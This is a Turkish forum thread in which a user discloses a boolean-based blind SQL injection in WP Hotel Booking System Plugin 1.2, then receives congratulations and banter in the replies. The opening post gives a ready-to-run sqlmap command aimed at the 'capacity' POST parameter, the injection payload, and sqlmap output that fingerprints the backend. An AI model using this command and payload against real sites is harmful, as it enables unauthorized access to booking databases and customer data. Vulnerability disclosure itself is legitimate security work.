İPUCU

Bug Researchers Yeni bulunan açıklar.

Seçenekler

WP Hotel Booking System Plugin 1.2 - SQL Injection / Pentester

06-05-2017 13:57
#1
Pentester - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
09/2016
Mesajlar:
1.168
Teşekkür (Etti):
613
Teşekkür (Aldı):
483
Konular:
89
Ticaret:
(0) %
WordPress Hotel Booking System Plugin 1.2 üzerinde yaptığım test sonucunda bulduğum, "Boolean-Based Blind SQL İnjection" zaafiyetini public ettim. Aynı zamanda videolu olarak anlattım.
Bug:
https://cxsecurity.com/issue/WLB-2017050039

Kod:
<------------------ header data start ------------------- >
#############################################################
# Application Name : WP Hotel Booking System Plugin 1.2 
# Vulnerable Type : Boolean-Based Blind SQL İnjection
# Software Link: https://www.bestsoftinc.com/
# Tested On Demo Site:
http://envato.bestsoftinc.net/wp-hotel/
# Author: Siber Güvenlik Akademisi - Pentester
# Date: 05.05.2017
# Tested on: Windows 8.1 / Mozilla Firefox
# Vulnerable Parameter: 'capacity' (POST)
# SQLİ: Http://localhost/wphotel/
# Proof of concept:
sqlmap -u "http://localhost/wphotel/" --data="check_in=05%2F05%2F2017&check_out=05%2F20%2F2017&capacity=1&child_per_room=1" -p "capacity" --random-agent --threads=5 --dbs

Parameter: capacity (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: check_in=05/10/2017&check_out=06/26/2017&capacity=1 AND 6953=6953&c
hild_per_room=1
---
[20:44:25] [INFO] testing MySQL
[20:44:28] [INFO] confirming MySQL
[20:44:31] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16

< ------------------- header data end of ------------------- >
VİDEO

Kullanıcı İmzası
"Benim naçiz vücudum, bir gün elbet toprak olacaktır. Fakat Türkiye Cumhuriyeti, ilelebet payidar kalacaktır."
Mustafa Kemal ATATÜRK

Yapabildiğimiz her şeyi yapsaydık, buna kendimiz bile şaşardık.

06-05-2017 14:00
#2
b0mb - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Nereden:
İzmir
Yaş:
17
Mesajlar:
471
Teşekkür (Etti):
143
Teşekkür (Aldı):
219
Konular:
64
Ticaret:
(0) %
Ellerine sağlık
Pentester Teşekkür etti.
06-05-2017 14:01
#3
Leopic - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
02/2016
Mesajlar:
9.951
Teşekkür (Etti):
28
Teşekkür (Aldı):
4332
Konular:
2068
Ticaret:
(0) %
ellerine sağlık .
Pentester Teşekkür etti.
06-05-2017 14:07
#4
Üyelik tarihi:
03/2017
Nereden:
Sinop
Mesajlar:
1.615
Teşekkür (Etti):
101
Teşekkür (Aldı):
126
Konular:
34
Ticaret:
(0) %
Eline sağlık
Kullanıcı İmzası
2019 Dönüş Vakti Olacak.
Pentester Teşekkür etti.
06-05-2017 14:13
#5
``Falcone - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
06/2016
Nereden:
l1ackerone
Mesajlar:
3.548
Teşekkür (Etti):
2339
Teşekkür (Aldı):
1231
Konular:
230
Ticaret:
(0) %
Eline Sağlık
Pentester Teşekkür etti.
06-05-2017 14:14
#6
MyGf - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
07/2016
Nereden:
Hall of Fame
Mesajlar:
3.271
Teşekkür (Etti):
510
Teşekkür (Aldı):
1257
Konular:
312
Ticaret:
(0) %
Eline sağlık.
Pentester Teşekkür etti.
06-05-2017 14:16
#7
'GonzaLes - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
04/2015
Nereden:
Kayseri
Yaş:
80
Mesajlar:
11.595
Teşekkür (Etti):
7115
Teşekkür (Aldı):
7517
Konular:
891
Ticaret:
(0) %
Ooo pentest coşturmuş buraları haberimiz yok
Zaafiyet kodlarına kadar sağlık kardeşim cansın
Kullanıcı İmzası
Her çözüm geçerli bir çözüm değildir!
'GonzaLes

drwx--x--x
Tüm konularım için tıkla<
Pentester Teşekkür etti.
06-05-2017 14:19
#8
Pentester - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
09/2016
Mesajlar:
1.168
Teşekkür (Etti):
613
Teşekkür (Aldı):
483
Konular:
89
Ticaret:
(0) %
Alıntı:
'GonzaLes´isimli üyeden Alıntı Mesajı göster
Ooo pentest coşturmuş buraları haberimiz yok
Zaafiyet kodlarına kadar sağlık kardeşim cansın
zaafiyet kodları? WP Plugin zafiyetini yaratan kodlara sağlık diyorsun yani
Kullanıcı İmzası
"Benim naçiz vücudum, bir gün elbet toprak olacaktır. Fakat Türkiye Cumhuriyeti, ilelebet payidar kalacaktır."
Mustafa Kemal ATATÜRK

Yapabildiğimiz her şeyi yapsaydık, buna kendimiz bile şaşardık.
'GonzaLes Teşekkür etti.
06-05-2017 14:20
#9
'GonzaLes - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
04/2015
Nereden:
Kayseri
Yaş:
80
Mesajlar:
11.595
Teşekkür (Etti):
7115
Teşekkür (Aldı):
7517
Konular:
891
Ticaret:
(0) %
Alıntı:
Pentester´isimli üyeden Alıntı Mesajı göster
zaafiyet kodları? WP Plugin zafiyetini yaratan kodlara sağlık diyorsun yani
Tek o olmakla kalmasın klavyenin arasına giren pisküvüt parçasına kadar olsun be
Kullanıcı İmzası
Her çözüm geçerli bir çözüm değildir!
'GonzaLes

drwx--x--x
Tüm konularım için tıkla<
06-05-2017 14:22
#10
Pentester - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
09/2016
Mesajlar:
1.168
Teşekkür (Etti):
613
Teşekkür (Aldı):
483
Konular:
89
Ticaret:
(0) %
Alıntı:
'GonzaLes´isimli üyeden Alıntı Mesajı göster
Tek o olmakla kalmasın klavyenin arasına giren pisküvüt parçasına kadar olsun be
Arasan bulamazsın ya, temizdir neyse daha fazla post kasmayalım biz burada
Kullanıcı İmzası
"Benim naçiz vücudum, bir gün elbet toprak olacaktır. Fakat Türkiye Cumhuriyeti, ilelebet payidar kalacaktır."
Mustafa Kemal ATATÜRK

Yapabildiğimiz her şeyi yapsaydık, buna kendimiz bile şaşardık.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı